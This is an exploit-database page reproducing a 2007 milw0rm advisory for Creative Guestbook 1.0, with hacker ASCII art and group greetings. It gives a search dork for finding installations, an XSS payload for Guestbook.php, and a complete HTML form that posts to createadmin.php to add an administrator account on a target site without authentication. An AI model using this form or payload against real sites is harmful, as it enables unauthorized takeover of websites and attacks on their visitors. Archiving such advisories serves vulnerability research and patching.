header-logo
Suggest Exploit
vendor:
Creative Guestbook 1.0
by:
Dj7xpl
N/A
CVSS
N/A
Add Remote Admin User, Cross Site Scripting
CWE
Product Name: Creative Guestbook 1.0
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: No
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Creative Guestbook 1.0 Add Remote Admin User and Cross Site Scripting Vulnerability

The Creative Guestbook 1.0 portal allows an attacker to add a remote admin user and perform cross site scripting attacks. The portal can be downloaded from http://www.thecreativeheads.de/CreativeFiles/downloads.php. The vulnerability can be exploited by inserting malicious scripts in the Guestbook.php file. An example script is <script> alert (' dj7xpl ^_^ ') </script>.

Mitigation:

Unknown
Source

Exploit-DB raw data:

                                                          .-""""""""-.                                 
                                                         /   Dj7xpl   \                              
                                                        |              |                                
                                                        |,  .-.  .-.  ,|                                
                                                        | )(_o/  \o_)( |                                     
                                                        |/     /\     \|                                 
                                              (@_       (_     ^^     _)                  
                                         _     ) \_______\__|IIIIII|__/_______________________________
                                        (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                               )_/        \          / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In World___________________________________________+
#
#
#   Portal     :   Creative Guestbook 1.0
#   Download   :   http://www.thecreativeheads.de/CreativeFiles/downloads.php
#   Author     :   Dj7xpl  | Dj7xpl@yahoo.com
#   Dork       :   "Creative Guestbook"
#   Class      :   (Add Remote Admin User)   And   (Cross Site Scripting)
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#   css/xss :
#              http://[Target]/[Path]/Guestbook.php   <== Insert Yor Script
#              Example : <script> alert ('  dj7xpl ^_^  ') </script>
#
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#   Add Remote Admin User :
#	
#	<form name="admin" method="post" action="http://[target]/[path]/createadmin.php?PHPSESSID='.session_id().'">
#       <input type="text" name="Name" value="name"><br>
#       <input type="text" name="Email"value="email"><br>
#       <input type="text" name="PASSWORD" value="password"><br>
#       <input type="submit" value="Admin hinzuf&uuml;gen" name="submit">
#   </form>
#	
#	
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#    Sp Tnx      :  Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org,Simorgh .............
#
#
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-03-15]